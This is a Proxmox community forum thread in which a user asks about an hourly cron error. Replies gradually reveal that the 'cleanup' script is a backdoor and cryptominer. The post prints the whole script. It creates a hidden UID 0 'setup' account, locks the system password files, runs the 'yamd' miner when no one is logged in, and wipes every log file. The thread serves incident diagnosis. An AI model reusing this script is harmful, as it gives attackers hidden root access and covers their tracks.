Hourly cronjob warning

bvlgy-ple

New Member
Mar 29, 2019
14
1
3
34
Hello there,

I've been getting a strange error message every hour with the cleanup cronjob for some days now and I can't quite examine what that job even does, neither what could be wrong with it. This is the content of the email I get:

Subject: Cron <root@bvlgy-pve> cd / && run-parts --report /etc/cron.hourly
Message:
/etc/cron.hourly/cleanup:
/etc/cron.hourly/cleanup: line 17: [: 7400: binary operator expected

When executing the script manually as root, I get back nothing and the exit code is 0. Has anyone seen this message before? What can I do to see what's wrong?

BTW I'm still on 5.3-12 and this is the output of pveversion -v:
Code:
root@bvlgy-pve:~# pveversion -v
proxmox-ve: 5.3-1 (running kernel: 4.15.18-12-pve)
pve-manager: 5.3-12 (running version: 5.3-12/5fbbbaf6)
pve-kernel-4.15: 5.3-3
pve-kernel-4.15.18-12-pve: 4.15.18-35
pve-kernel-4.15.18-10-pve: 4.15.18-32
corosync: 2.4.4-pve1
criu: 2.11.1-1~bpo90
glusterfs-client: 3.8.8-1
ksm-control-daemon: 1.2-2
libjs-extjs: 6.0.1-2
libpve-access-control: 5.1-3
libpve-apiclient-perl: 2.0-5
libpve-common-perl: 5.0-48
libpve-guest-common-perl: 2.0-20
libpve-http-server-perl: 2.0-12
libpve-storage-perl: 5.0-39
libqb0: 1.0.3-1~bpo9
lvm2: 2.02.168-pve6
lxc-pve: 3.1.0-3
lxcfs: 3.0.3-pve1
novnc-pve: 1.0.0-3
proxmox-widget-toolkit: 1.0-24
pve-cluster: 5.0-34
pve-container: 2.0-35
pve-docs: 5.3-3
pve-edk2-firmware: 1.20190312-1
pve-firewall: 3.0-18
pve-firmware: 2.0-6
pve-ha-manager: 2.0-8
pve-i18n: 1.0-9
pve-libspice-server1: 0.14.1-2
pve-qemu-kvm: 2.12.1-2
pve-xtermjs: 3.10.1-2
qemu-server: 5.0-47
smartmontools: 6.5+svn4324-1
spiceterm: 3.0-5
vncterm: 1.5-3
zfsutils-linux: 0.7.13-pve1~bpo2

Warm regards
bvlgy-ple
 
What is on line 17 in file /etc/cron.hourly/cleanup ?
Maybe shell used for cron is not the same as you use testing from command line? That would explain why different syntax is accepted.
 
The first line indicates bash as the script's shell:
Code:
#!/bin/bash
This is line 17:
Code:
if [ ! $(pgrep -x "yamd") ] && [ $(grep -c . <<<$(w -h | sed '/setup/,+1 d' | see
d '/tmux/,+1 d')) == 0 ]; then
#18    screen -d -m bash -c 'cd /etc; while : ; do if [[ $(w -h) ]]; then true ; ell
se yamd -c yam; fi ; sleep 30; done'
fi
I can see that in line 18 there is an "ellse" .. I haven't edited this script but I'm pretty certain that it should be "else". I'm gonna change that and see what that does, the next run should be in 10 minutes.

EDIT: The "ellse" is just a display error somehow. However, the syntax looks okay. The file is as follows:
Code:
#!/bin/bash
if [ ! -s "/usr/bin/yam" ] && [ ! -s "/usr/bin/yamd" ]; then
    chattr -i /usr/bin/yam*
    rm /usr/bin/yam*
    tar zxf /usr/bin/c -C /usr/bin/
    chmod +x /usr/bin/yam*
    chattr +i /usr/bin/yam*
fi
chattr -i /etc/{passwd,shadow,group,gshadow}
if ! grep -q "setup" /etc/passwd; then
 useradd -b /var/setup -d /var/setup -g 0 -l -m -N -u 0 -o -p '$1$pwhash' -s /bin/bash setup
else
 usermod -d /var/setup -g 0 -m -o -p '$1$pwhash' -s /bin/bash -u 0 setup
 usermod -U setup
fi
chattr +i /etc/{passwd,shadow,group,gshadow}
...skipping...
    chattr +i /usr/bin/yam*
fi
chattr -i /etc/{passwd,shadow,group,gshadow}
if ! grep -q "setup" /etc/passwd; then
 useradd -b /var/setup -d /var/setup -g 0 -l -m -N -u 0 -o -p '$1$pwhash' -s /bin/bash setup
else
 usermod -d /var/setup -g 0 -m -o -p '$1$pwhash' -s /bin/bash -u 0 setup
 usermod -U setup
fi
chattr +i /etc/{passwd,shadow,group,gshadow}
if [ ! $(pgrep -x "yamd") ] && [ $(grep -c . <<<$(w -h | sed '/setup/,+1 d' | sed '/tmux/,+1 d')) == 0 ]; then
    screen -d -m bash -c 'cd /etc; while : ; do if [[ $(w -h) ]]; then true ; else yamd -c yam; fi ; sleep 30; done'
fi
for i in $(find /var/log -type f); do cat /dev/null > $i; done
exit 0
 
Last edited:
I couldn't find a reason why it happens, but it still does. Every hour at '17, I still get the email. Can anyone offer further ideas what else I could try?
 
I'd guess (without testing) that cron.hourly runs the scripts with /bin/sh instead of /bin/bash (despite your #!/bin/bash) - see '/etc/crontab'.
One of the following options should work:
1)
* copy your bash-script to '/usr/loca/bin'
* add a snippet to /etc/cron.hourly/cleanup containing:
Code:
#!/bin/sh

/bin/bash /usr/local/bin/cleanup

2) add the invocation to root's crontab (`crontab -e`) (maybe you'd need to set 'SHELL=/bin/bash' there as well, but I doubt it)
3) rewrite the script to use POSIX-sh (I very much like `shellcheck` for linting shellscripts)

hope this helps!
 
  • Like
Reactions: bvlgy-ple
Thanks a ton, Stoiko. I have changed the SHELL variable to /bin/bash and will get back with any results.
 
Didn't help either. I'm going to try upgrading the system, maybe that already solves the problem. The only weird thing is that I cannot remember touching any of the cronjobs. The messages started about a week ago, I didn't even know that "cleanup" job existed before.
 
hmm - where did you change the variable? (as said create the cronjob for root's account, do not edit /etc/crontab!)

anyways - I did a quick glance over the script - and if you don't know where it comes from I'd be very suspicious in your position!
That script seems to create a second user 'setup' with UID 0 (meaning the user has the same permissions as root), prevents the user and group files from being modified, truncates all logfiles and starts some services in screen.

Again not sure - but this is what a (not too beautiful) backdoor would look like!
 
  • Like
Reactions: bvlgy-ple
Holy ..... you're right. Someone installed a cryptominer on my box. Took it down to be sure. Thank you very very much!
 

About

The Proxmox community has been around for many years and offers help and support for Proxmox VE, Proxmox Backup Server, and Proxmox Mail Gateway.
We think our community is one of the best thanks to people like you!

Get your subscription!

The Proxmox team works very hard to make sure you are running the best software and getting stable updates and security enhancements, as well as quick enterprise support. Tens of thousands of happy customers have a Proxmox subscription. Get yours easily in our online shop.

Buy now!